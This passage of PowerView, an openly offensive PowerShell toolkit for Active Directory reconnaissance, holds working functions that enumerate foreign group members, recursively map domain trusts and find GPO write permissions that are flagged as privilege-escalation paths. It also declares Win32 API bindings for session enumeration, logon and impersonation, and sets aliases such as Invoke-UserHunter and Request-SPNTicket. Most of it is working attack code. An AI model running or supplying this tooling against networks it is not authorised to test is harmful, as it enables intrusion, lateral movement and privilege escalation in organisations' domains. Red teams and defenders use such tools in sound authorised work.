# if the group domain doesn't match the user domain, display it
$GroupName = $Membership.Split(',')[0].split('=')[1]
$ForeignUser = New-Object PSObject
$ForeignUser | Add-Member Noteproperty 'UserDomain' $TargetDomain
$ForeignUser | Add-Member Noteproperty 'UserName' $_.samaccountname
$ForeignUser | Add-Member Noteproperty 'UserDistinguishedName' $_.distinguishedname
$ForeignUser | Add-Member Noteproperty 'GroupDomain' $GroupDomain
$ForeignUser | Add-Member Noteproperty 'GroupName' $GroupName
$ForeignUser | Add-Member Noteproperty 'GroupDistinguishedName' $Membership
$ForeignUser.PSObject.TypeNames.Insert(0, 'PowerView.ForeignUser')
$ForeignUser
}
}
}
}
}
}
function Get-DomainForeignGroupMember {
<#
.SYNOPSIS
Enumerates groups with users outside of the group's domain and returns
each foreign member. This is a domain's "incoming" access.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-Domain, Get-DomainGroup
.DESCRIPTION
Uses Get-DomainGroup to enumerate all groups for the current (or target) domain,
then enumerates the members of each group, and compares the member's domain
name to the parent group's domain name, outputting the member if the domains differ.
.PARAMETER Domain
Specifies the domain to use for the query, defaults to the current domain.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER Properties
Specifies the properties of the output object to retrieve from the server.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER SecurityMasks
Specifies an option for examining security information of a directory object.
One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainForeignGroupMember
Return all group members in the current domain where the group and member differ.
.EXAMPLE
Get-DomainForeignGroupMember -Domain dev.testlab.local
Return all group members in the dev.testlab.local domain where the member is not in dev.testlab.local.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainForeignGroupMember -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred
Return all group members in the dev.testlab.local domain where the member is
not in dev.testlab.local. binding to the secondary.dev.testlab.local for
queries, and using the specified alternate credentials.
.OUTPUTS
PowerView.ForeignGroupMember
Custom PSObject with translated group member property fields.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.ForeignGroupMember')]
[CmdletBinding()]
Param(
[Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
[Alias('Name')]
[ValidateNotNullOrEmpty()]
[String]
$Domain,
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[ValidateNotNullOrEmpty()]
[String[]]
$Properties,
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[ValidateSet('Dacl', 'Group', 'None', 'Owner', 'Sacl')]
[String]
$SecurityMasks,
[Switch]
$Tombstone,
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
BEGIN {
$SearcherArguments = @{}
$SearcherArguments['LDAPFilter'] = '(member=*)'
if ($PSBoundParameters['Properties']) { $SearcherArguments['Properties'] = $Properties }
if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['SecurityMasks']) { $SearcherArguments['SecurityMasks'] = $SecurityMasks }
if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential }
if ($PSBoundParameters['Raw']) { $SearcherArguments['Raw'] = $Raw }
}
PROCESS {
if ($PSBoundParameters['Domain']) {
$SearcherArguments['Domain'] = $Domain
$TargetDomain = $Domain
}
elseif ($PSBoundParameters['Credential']) {
$TargetDomain = Get-Domain -Credential $Credential | Select-Object -ExpandProperty name
}
elseif ($Env:USERDNSDOMAIN) {
$TargetDomain = $Env:USERDNSDOMAIN
}
else {
throw "[Get-DomainForeignGroupMember] No domain found to enumerate!"
}
# standard group names to ignore
$ExcludeGroups = @('Users', 'Domain Users', 'Guests')
$DomainDN = "DC=$($TargetDomain.Replace('.', ',DC='))"
Get-DomainGroup @SearcherArguments | Where-Object {$ExcludeGroups -notcontains $_.samaccountname} | ForEach-Object {
$GroupName = $_.samAccountName
$GroupDistinguishedName = $_.distinguishedname
$_.member | ForEach-Object {
# filter for foreign SIDs in the cn field for users in another domain,
# or if the DN doesn't end with the proper DN for the queried domain
if (($_ -match 'CN=S-1-5-21.*-.*') -or ($DomainDN -ne ($_.SubString($_.IndexOf('DC='))))) {
$MemberDistinguishedName = $_
$MemberDomain = $_.SubString($_.IndexOf('DC=')) -replace 'DC=','' -replace ',','.'
$MemberName = $_.Split(',')[0].split('=')[1]
$ForeignGroupMember = New-Object PSObject
$ForeignGroupMember | Add-Member Noteproperty 'GroupDomain' $TargetDomain
$ForeignGroupMember | Add-Member Noteproperty 'GroupName' $GroupName
$ForeignGroupMember | Add-Member Noteproperty 'GroupDistinguishedName' $GroupDistinguishedName
$ForeignGroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain
$ForeignGroupMember | Add-Member Noteproperty 'MemberName' $MemberName
$ForeignGroupMember | Add-Member Noteproperty 'MemberDistinguishedName' $MemberDistinguishedName
$ForeignGroupMember.PSObject.TypeNames.Insert(0, 'PowerView.ForeignGroupMember')
$ForeignGroupMember
}
}
}
}
}
function Get-DomainTrustMapping {
<#
.SYNOPSIS
This function enumerates all trusts for the current domain and then enumerates
all trusts for each domain it finds.
Author: Will Schroeder (@harmj0y)
License: BSD 3-Clause
Required Dependencies: Get-Domain, Get-DomainTrust, Get-ForestTrust
.DESCRIPTION
This function will enumerate domain trust relationships for the current domain using
a number of methods, and then enumerates all trusts for each found domain, recursively
mapping all reachable trust relationships. By default, the .NET method GetAllTrustRelationships()
is used on the System.DirectoryServices.ActiveDirectory.Domain object. If the -LDAP flag
is specified, or any of the LDAP-appropriate parameters, an LDAP search using the filter
'(objectClass=trustedDomain)' is used instead. If the -API flag is specified, the
Win32 API DsEnumerateDomainTrusts() call is used to enumerate instead.
.PARAMETER API
Switch. Use an API call (DsEnumerateDomainTrusts) to enumerate the trusts instead of the built-in
.NET methods.
.PARAMETER LDAP
Switch. Use LDAP queries to enumerate the trusts instead of direct domain connections.
.PARAMETER LDAPFilter
Specifies an LDAP query string that is used to filter Active Directory objects.
.PARAMETER Properties
Specifies the properties of the output object to retrieve from the server.
.PARAMETER SearchBase
The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
Useful for OU queries.
.PARAMETER Server
Specifies an Active Directory server (domain controller) to bind to.
.PARAMETER SearchScope
Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
.PARAMETER ResultPageSize
Specifies the PageSize to set for the LDAP searcher object.
.PARAMETER ServerTimeLimit
Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
.PARAMETER Tombstone
Switch. Specifies that the searcher should also return deleted/tombstoned objects.
.PARAMETER Credential
A [Management.Automation.PSCredential] object of alternate credentials
for connection to the target domain.
.EXAMPLE
Get-DomainTrustMapping | Export-CSV -NoTypeInformation trusts.csv
Map all reachable domain trusts using .NET methods and output everything to a .csv file.
.EXAMPLE
Get-DomainTrustMapping -API | Export-CSV -NoTypeInformation trusts.csv
Map all reachable domain trusts using Win32 API calls and output everything to a .csv file.
.EXAMPLE
Get-DomainTrustMapping -LDAP -Server 'PRIMARY.testlab.local' | Export-CSV -NoTypeInformation trusts.csv
Map all reachable domain trusts using LDAP, binding to the PRIMARY.testlab.local server for queries,
and output everything to a .csv file.
.EXAMPLE
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Get-DomainTrustMapping -LDAP -Server 'PRIMARY.testlab.local' | Export-CSV -NoTypeInformation trusts.csv
Map all reachable domain trusts using LDAP, binding to the PRIMARY.testlab.local server for queries
using the specified alternate credentials, and output everything to a .csv file.
.OUTPUTS
PowerView.DomainTrust.NET
A TrustRelationshipInformationCollection returned when using .NET methods (default).
PowerView.DomainTrust.LDAP
Custom PSObject with translated domain LDAP trust result fields.
PowerView.DomainTrust.API
Custom PSObject with translated domain API trust result fields.
#>
[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
[OutputType('PowerView.DomainTrust.NET')]
[OutputType('PowerView.DomainTrust.LDAP')]
[OutputType('PowerView.DomainTrust.API')]
[CmdletBinding(DefaultParameterSetName = 'NET')]
Param(
[Parameter(ParameterSetName = 'API')]
[Switch]
$API,
[Parameter(ParameterSetName = 'LDAP')]
[Switch]
$LDAP,
[Parameter(ParameterSetName = 'LDAP')]
[ValidateNotNullOrEmpty()]
[Alias('Filter')]
[String]
$LDAPFilter,
[Parameter(ParameterSetName = 'LDAP')]
[ValidateNotNullOrEmpty()]
[String[]]
$Properties,
[Parameter(ParameterSetName = 'LDAP')]
[ValidateNotNullOrEmpty()]
[Alias('ADSPath')]
[String]
$SearchBase,
[Parameter(ParameterSetName = 'LDAP')]
[Parameter(ParameterSetName = 'API')]
[ValidateNotNullOrEmpty()]
[Alias('DomainController')]
[String]
$Server,
[Parameter(ParameterSetName = 'LDAP')]
[ValidateSet('Base', 'OneLevel', 'Subtree')]
[String]
$SearchScope = 'Subtree',
[Parameter(ParameterSetName = 'LDAP')]
[ValidateRange(1, 10000)]
[Int]
$ResultPageSize = 200,
[Parameter(ParameterSetName = 'LDAP')]
[ValidateRange(1, 10000)]
[Int]
$ServerTimeLimit,
[Parameter(ParameterSetName = 'LDAP')]
[Switch]
$Tombstone,
[Parameter(ParameterSetName = 'LDAP')]
[Management.Automation.PSCredential]
[Management.Automation.CredentialAttribute()]
$Credential = [Management.Automation.PSCredential]::Empty
)
# keep track of domains seen so we don't hit infinite recursion
$SeenDomains = @{}
# our domain status tracker
$Domains = New-Object System.Collections.Stack
$DomainTrustArguments = @{}
if ($PSBoundParameters['API']) { $DomainTrustArguments['API'] = $API }
if ($PSBoundParameters['LDAP']) { $DomainTrustArguments['LDAP'] = $LDAP }
if ($PSBoundParameters['LDAPFilter']) { $DomainTrustArguments['LDAPFilter'] = $LDAPFilter }
if ($PSBoundParameters['Properties']) { $DomainTrustArguments['Properties'] = $Properties }
if ($PSBoundParameters['SearchBase']) { $DomainTrustArguments['SearchBase'] = $SearchBase }
if ($PSBoundParameters['Server']) { $DomainTrustArguments['Server'] = $Server }
if ($PSBoundParameters['SearchScope']) { $DomainTrustArguments['SearchScope'] = $SearchScope }
if ($PSBoundParameters['ResultPageSize']) { $DomainTrustArguments['ResultPageSize'] = $ResultPageSize }
if ($PSBoundParameters['ServerTimeLimit']) { $DomainTrustArguments['ServerTimeLimit'] = $ServerTimeLimit }
if ($PSBoundParameters['Tombstone']) { $DomainTrustArguments['Tombstone'] = $Tombstone }
if ($PSBoundParameters['Credential']) { $DomainTrustArguments['Credential'] = $Credential }
# get the current domain and push it onto the stack
if ($PSBoundParameters['Credential']) {
$CurrentDomain = (Get-Domain -Credential $Credential).Name
}
else {
$CurrentDomain = (Get-Domain).Name
}
$Domains.Push($CurrentDomain)
while($Domains.Count -ne 0) {
$Domain = $Domains.Pop()
# if we haven't seen this domain before
if ($Domain -and ($Domain.Trim() -ne '') -and (-not $SeenDomains.ContainsKey($Domain))) {
Write-Verbose "[Get-DomainTrustMapping] Enumerating trusts for domain: '$Domain'"
# mark it as seen in our list
$Null = $SeenDomains.Add($Domain, '')
try {
# get all the trusts for this domain
$DomainTrustArguments['Domain'] = $Domain
$Trusts = Get-DomainTrust @DomainTrustArguments
if ($Trusts -isnot [System.Array]) {
$Trusts = @($Trusts)
}
# get any forest trusts, if they exist
if ($PsCmdlet.ParameterSetName -eq 'LDAP') {
$ForestTrustArguments = @{}
if ($PSBoundParameters['Forest']) { $ForestTrustArguments['Forest'] = $Forest }
if ($PSBoundParameters['Credential']) { $ForestTrustArguments['Credential'] = $Credential }
$Trusts += Get-ForestTrust @ForestTrustArguments
}
if ($Trusts) {
if ($Trusts -isnot [System.Array]) {
$Trusts = @($Trusts)
}
# enumerate each trust found
ForEach ($Trust in $Trusts) {
if ($Trust.SourceName -and $Trust.TargetName) {
# make sure we process the target
$Null = $Domains.Push($Trust.TargetName)
$Trust
}
}
}
}
catch {
Write-Verbose "[Get-DomainTrustMapping] Error: $_"
}
}
}
}
function Get-GPODelegation
{
<#
.SYNOPSIS
Finds users with write permissions on GPO objects which may allow privilege escalation within the domain.
Author: Itamar Mizrahi (@MrAnde7son)
License: BSD 3-Clause
Required Dependencies: None
.PARAMETER GPOName
The GPO display name to query for, wildcards accepted.
.PARAMETER PageSize
Specifies the PageSize to set for the LDAP searcher object.
.EXAMPLE
Get-GPODelegation
Returns all GPO delegations in current forest.
.EXAMPLE
Get-GPODelegation -GPOName
Returns all GPO delegations on a given GPO.
#>
[CmdletBinding()]
Param (
[String]
$GPOName = '*',
[ValidateRange(1,10000)]
[Int]
$PageSize = 200
)
$Exclusions = @("SYSTEM","Domain Admins","Enterprise Admins")
$Forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
$DomainList = @($Forest.Domains)
$Domains = $DomainList | foreach { $_.GetDirectoryEntry() }
foreach ($Domain in $Domains) {
$Filter = "(&(objectCategory=groupPolicyContainer)(displayname=$GPOName))"
$Searcher = New-Object System.DirectoryServices.DirectorySearcher
$Searcher.SearchRoot = $Domain
$Searcher.Filter = $Filter
$Searcher.PageSize = $PageSize
$Searcher.SearchScope = "Subtree"
$listGPO = $Searcher.FindAll()
foreach ($gpo in $listGPO){
$ACL = ([ADSI]$gpo.path).ObjectSecurity.Access | ? {$_.ActiveDirectoryRights -match "Write" -and $_.AccessControlType -eq "Allow" -and $Exclusions -notcontains $_.IdentityReference.toString().split("\")[1] -and $_.IdentityReference -ne "CREATOR OWNER"}
if ($ACL -ne $null){
$GpoACL = New-Object psobject
$GpoACL | Add-Member Noteproperty 'ADSPath' $gpo.Properties.adspath
$GpoACL | Add-Member Noteproperty 'GPODisplayName' $gpo.Properties.displayname
$GpoACL | Add-Member Noteproperty 'IdentityReference' $ACL.IdentityReference
$GpoACL | Add-Member Noteproperty 'ActiveDirectoryRights' $ACL.ActiveDirectoryRights
$GpoACL
}
}
}
}
########################################################
#
# Expose the Win32API functions and datastructures below
# using PSReflect.
# Warning: Once these are executed, they are baked in
# and can't be changed while the script is running!
#
########################################################
$Mod = New-InMemoryModule -ModuleName Win32
# [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingPositionalParameters', Scope='Function', Target='psenum')]
# used to parse the 'samAccountType' property for users/computers/groups
$SamAccountTypeEnum = psenum $Mod PowerView.SamAccountTypeEnum UInt32 @{
DOMAIN_OBJECT = '0x00000000'
GROUP_OBJECT = '0x10000000'
NON_SECURITY_GROUP_OBJECT = '0x10000001'
ALIAS_OBJECT = '0x20000000'
NON_SECURITY_ALIAS_OBJECT = '0x20000001'
USER_OBJECT = '0x30000000'
MACHINE_ACCOUNT = '0x30000001'
TRUST_ACCOUNT = '0x30000002'
APP_BASIC_GROUP = '0x40000000'
APP_QUERY_GROUP = '0x40000001'
ACCOUNT_TYPE_MAX = '0x7fffffff'
}
# used to parse the 'grouptype' property for groups
$GroupTypeEnum = psenum $Mod PowerView.GroupTypeEnum UInt32 @{
CREATED_BY_SYSTEM = '0x00000001'
GLOBAL_SCOPE = '0x00000002'
DOMAIN_LOCAL_SCOPE = '0x00000004'
UNIVERSAL_SCOPE = '0x00000008'
APP_BASIC = '0x00000010'
APP_QUERY = '0x00000020'
SECURITY = '0x80000000'
} -Bitfield
# used to parse the 'userAccountControl' property for users/groups
$UACEnum = psenum $Mod PowerView.UACEnum UInt32 @{
SCRIPT = 1
ACCOUNTDISABLE = 2
HOMEDIR_REQUIRED = 8
LOCKOUT = 16
PASSWD_NOTREQD = 32
PASSWD_CANT_CHANGE = 64
ENCRYPTED_TEXT_PWD_ALLOWED = 128
TEMP_DUPLICATE_ACCOUNT = 256
NORMAL_ACCOUNT = 512
INTERDOMAIN_TRUST_ACCOUNT = 2048
WORKSTATION_TRUST_ACCOUNT = 4096
SERVER_TRUST_ACCOUNT = 8192
DONT_EXPIRE_PASSWORD = 65536
MNS_LOGON_ACCOUNT = 131072
SMARTCARD_REQUIRED = 262144
TRUSTED_FOR_DELEGATION = 524288
NOT_DELEGATED = 1048576
USE_DES_KEY_ONLY = 2097152
DONT_REQ_PREAUTH = 4194304
PASSWORD_EXPIRED = 8388608
TRUSTED_TO_AUTH_FOR_DELEGATION = 16777216
PARTIAL_SECRETS_ACCOUNT = 67108864
} -Bitfield
# enum used by $WTS_SESSION_INFO_1 below
$WTSConnectState = psenum $Mod WTS_CONNECTSTATE_CLASS UInt16 @{
Active = 0
Connected = 1
ConnectQuery = 2
Shadow = 3
Disconnected = 4
Idle = 5
Listen = 6
Reset = 7
Down = 8
Init = 9
}
# the WTSEnumerateSessionsEx result structure
$WTS_SESSION_INFO_1 = struct $Mod PowerView.RDPSessionInfo @{
ExecEnvId = field 0 UInt32
State = field 1 $WTSConnectState
SessionId = field 2 UInt32
pSessionName = field 3 String -MarshalAs @('LPWStr')
pHostName = field 4 String -MarshalAs @('LPWStr')
pUserName = field 5 String -MarshalAs @('LPWStr')
pDomainName = field 6 String -MarshalAs @('LPWStr')
pFarmName = field 7 String -MarshalAs @('LPWStr')
}
# the particular WTSQuerySessionInformation result structure
$WTS_CLIENT_ADDRESS = struct $mod WTS_CLIENT_ADDRESS @{
AddressFamily = field 0 UInt32
Address = field 1 Byte[] -MarshalAs @('ByValArray', 20)
}
# the NetShareEnum result structure
$SHARE_INFO_1 = struct $Mod PowerView.ShareInfo @{
Name = field 0 String -MarshalAs @('LPWStr')
Type = field 1 UInt32
Remark = field 2 String -MarshalAs @('LPWStr')
}
# the NetWkstaUserEnum result structure
$WKSTA_USER_INFO_1 = struct $Mod PowerView.LoggedOnUserInfo @{
UserName = field 0 String -MarshalAs @('LPWStr')
LogonDomain = field 1 String -MarshalAs @('LPWStr')
AuthDomains = field 2 String -MarshalAs @('LPWStr')
LogonServer = field 3 String -MarshalAs @('LPWStr')
}
# the NetSessionEnum result structure
$SESSION_INFO_10 = struct $Mod PowerView.SessionInfo @{
CName = field 0 String -MarshalAs @('LPWStr')
UserName = field 1 String -MarshalAs @('LPWStr')
Time = field 2 UInt32
IdleTime = field 3 UInt32
}
# enum used by $LOCALGROUP_MEMBERS_INFO_2 below
$SID_NAME_USE = psenum $Mod SID_NAME_USE UInt16 @{
SidTypeUser = 1
SidTypeGroup = 2
SidTypeDomain = 3
SidTypeAlias = 4
SidTypeWellKnownGroup = 5
SidTypeDeletedAccount = 6
SidTypeInvalid = 7
SidTypeUnknown = 8
SidTypeComputer = 9
}
# the NetLocalGroupEnum result structure
$LOCALGROUP_INFO_1 = struct $Mod LOCALGROUP_INFO_1 @{
lgrpi1_name = field 0 String -MarshalAs @('LPWStr')
lgrpi1_comment = field 1 String -MarshalAs @('LPWStr')
}
# the NetLocalGroupGetMembers result structure
$LOCALGROUP_MEMBERS_INFO_2 = struct $Mod LOCALGROUP_MEMBERS_INFO_2 @{
lgrmi2_sid = field 0 IntPtr
lgrmi2_sidusage = field 1 $SID_NAME_USE
lgrmi2_domainandname = field 2 String -MarshalAs @('LPWStr')
}
# enums used in DS_DOMAIN_TRUSTS
$DsDomainFlag = psenum $Mod DsDomain.Flags UInt32 @{
IN_FOREST = 1
DIRECT_OUTBOUND = 2
TREE_ROOT = 4
PRIMARY = 8
NATIVE_MODE = 16
DIRECT_INBOUND = 32
} -Bitfield
$DsDomainTrustType = psenum $Mod DsDomain.TrustType UInt32 @{
DOWNLEVEL = 1
UPLEVEL = 2
MIT = 3
DCE = 4
}
$DsDomainTrustAttributes = psenum $Mod DsDomain.TrustAttributes UInt32 @{
NON_TRANSITIVE = 1
UPLEVEL_ONLY = 2
FILTER_SIDS = 4
FOREST_TRANSITIVE = 8
CROSS_ORGANIZATION = 16
WITHIN_FOREST = 32
TREAT_AS_EXTERNAL = 64
}
# the DsEnumerateDomainTrusts result structure
$DS_DOMAIN_TRUSTS = struct $Mod DS_DOMAIN_TRUSTS @{
NetbiosDomainName = field 0 String -MarshalAs @('LPWStr')
DnsDomainName = field 1 String -MarshalAs @('LPWStr')
Flags = field 2 $DsDomainFlag
ParentIndex = field 3 UInt32
TrustType = field 4 $DsDomainTrustType
TrustAttributes = field 5 $DsDomainTrustAttributes
DomainSid = field 6 IntPtr
DomainGuid = field 7 Guid
}
# used by WNetAddConnection2W
$NETRESOURCEW = struct $Mod NETRESOURCEW @{
dwScope = field 0 UInt32
dwType = field 1 UInt32
dwDisplayType = field 2 UInt32
dwUsage = field 3 UInt32
lpLocalName = field 4 String -MarshalAs @('LPWStr')
lpRemoteName = field 5 String -MarshalAs @('LPWStr')
lpComment = field 6 String -MarshalAs @('LPWStr')
lpProvider = field 7 String -MarshalAs @('LPWStr')
}
# all of the Win32 API functions we need
$FunctionDefinitions = @(
(func netapi32 NetShareEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
(func netapi32 NetWkstaUserEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
(func netapi32 NetSessionEnum ([Int]) @([String], [String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
(func netapi32 NetLocalGroupEnum ([Int]) @([String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
(func netapi32 NetLocalGroupGetMembers ([Int]) @([String], [String], [Int], [IntPtr].MakeByRefType(), [Int], [Int32].MakeByRefType(), [Int32].MakeByRefType(), [Int32].MakeByRefType())),
(func netapi32 DsGetSiteName ([Int]) @([String], [IntPtr].MakeByRefType())),
(func netapi32 DsEnumerateDomainTrusts ([Int]) @([String], [UInt32], [IntPtr].MakeByRefType(), [IntPtr].MakeByRefType())),
(func netapi32 NetApiBufferFree ([Int]) @([IntPtr])),
(func advapi32 ConvertSidToStringSid ([Int]) @([IntPtr], [String].MakeByRefType()) -SetLastError),
(func advapi32 OpenSCManagerW ([IntPtr]) @([String], [String], [Int]) -SetLastError),
(func advapi32 CloseServiceHandle ([Int]) @([IntPtr])),
(func advapi32 LogonUser ([Bool]) @([String], [String], [String], [UInt32], [UInt32], [IntPtr].MakeByRefType()) -SetLastError),
(func advapi32 ImpersonateLoggedOnUser ([Bool]) @([IntPtr]) -SetLastError),
(func advapi32 RevertToSelf ([Bool]) @() -SetLastError),
(func wtsapi32 WTSOpenServerEx ([IntPtr]) @([String])),
(func wtsapi32 WTSEnumerateSessionsEx ([Int]) @([IntPtr], [Int32].MakeByRefType(), [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError),
(func wtsapi32 WTSQuerySessionInformation ([Int]) @([IntPtr], [Int], [Int], [IntPtr].MakeByRefType(), [Int32].MakeByRefType()) -SetLastError),
(func wtsapi32 WTSFreeMemoryEx ([Int]) @([Int32], [IntPtr], [Int32])),
(func wtsapi32 WTSFreeMemory ([Int]) @([IntPtr])),
(func wtsapi32 WTSCloseServer ([Int]) @([IntPtr])),
(func Mpr WNetAddConnection2W ([Int]) @($NETRESOURCEW, [String], [String], [UInt32])),
(func Mpr WNetCancelConnection2 ([Int]) @([String], [Int], [Bool])),
(func kernel32 CloseHandle ([Bool]) @([IntPtr]) -SetLastError)
)
$Types = $FunctionDefinitions | Add-Win32Type -Module $Mod -Namespace 'Win32'
$Netapi32 = $Types['netapi32']
$Advapi32 = $Types['advapi32']
$Wtsapi32 = $Types['wtsapi32']
$Mpr = $Types['Mpr']
$Kernel32 = $Types['kernel32']
Set-Alias Get-IPAddress Resolve-IPAddress
Set-Alias Convert-NameToSid ConvertTo-SID
Set-Alias Convert-SidToName ConvertFrom-SID
Set-Alias Request-SPNTicket Get-DomainSPNTicket
Set-Alias Get-DNSZone Get-DomainDNSZone
Set-Alias Get-DNSRecord Get-DomainDNSRecord
Set-Alias Get-NetDomain Get-Domain
Set-Alias Get-NetDomainController Get-DomainController
Set-Alias Get-NetForest Get-Forest
Set-Alias Get-NetForestDomain Get-ForestDomain
Set-Alias Get-NetForestCatalog Get-ForestGlobalCatalog
Set-Alias Get-NetUser Get-DomainUser
Set-Alias Get-UserEvent Get-DomainUserEvent
Set-Alias Get-NetComputer Get-DomainComputer
Set-Alias Get-ADObject Get-DomainObject
Set-Alias Set-ADObject Set-DomainObject
Set-Alias Get-ObjectAcl Get-DomainObjectAcl
Set-Alias Add-ObjectAcl Add-DomainObjectAcl
Set-Alias Invoke-ACLScanner Find-InterestingDomainAcl
Set-Alias Get-GUIDMap Get-DomainGUIDMap
Set-Alias Get-NetOU Get-DomainOU
Set-Alias Get-NetSite Get-DomainSite
Set-Alias Get-NetSubnet Get-DomainSubnet
Set-Alias Get-NetGroup Get-DomainGroup
Set-Alias Find-ManagedSecurityGroups Get-DomainManagedSecurityGroup
Set-Alias Get-NetGroupMember Get-DomainGroupMember
Set-Alias Get-NetFileServer Get-DomainFileServer
Set-Alias Get-DFSshare Get-DomainDFSShare
Set-Alias Get-NetGPO Get-DomainGPO
Set-Alias Get-NetGPOGroup Get-DomainGPOLocalGroup
Set-Alias Find-GPOLocation Get-DomainGPOUserLocalGroupMapping
Set-Alias Find-GPOComputerAdmin Get-DomainGPOComputerLocalGroupMappin
Set-Alias Get-LoggedOnLocal Get-RegLoggedOn
Set-Alias Invoke-CheckLocalAdminAccess Test-AdminAccess
Set-Alias Get-SiteName Get-NetComputerSiteName
Set-Alias Get-Proxy Get-WMIRegProxy
Set-Alias Get-LastLoggedOn Get-WMIRegLastLoggedOn
Set-Alias Get-CachedRDPConnection Get-WMIRegCachedRDPConnection
Set-Alias Get-RegistryMountedDrive Get-WMIRegMountedDrive
Set-Alias Get-NetProcess Get-WMIProcess
Set-Alias Invoke-ThreadedFunction New-ThreadedFunction
Set-Alias Invoke-UserHunter Find-DomainUserLocation
Set-Alias Invoke-ProcessHunter Find-DomainProcess
Set-Alias Invoke-EventHunter Find-DomainUserEvent
Set-Alias Invoke-ShareFinder Find-DomainShare
Set-Alias Invoke-FileFinder Find-InterestingDomainShareFile
Set-Alias Invoke-EnumerateLocalAdmin Find-DomainLocalGroupMember
Set-Alias Get-NetDomainTrust Get-DomainTrust
Set-Alias Get-NetForestTrust Get-ForestTrust
Set-Alias Find-ForeignUser Get-DomainForeignUser
Set-Alias Find-ForeignGroup Get-DomainForeignGroupMember
Set-Alias Invoke-MapDomainTrust Get-DomainTrustMapping
Set-Alias Get-DomainPolicy Get-DomainPolicyData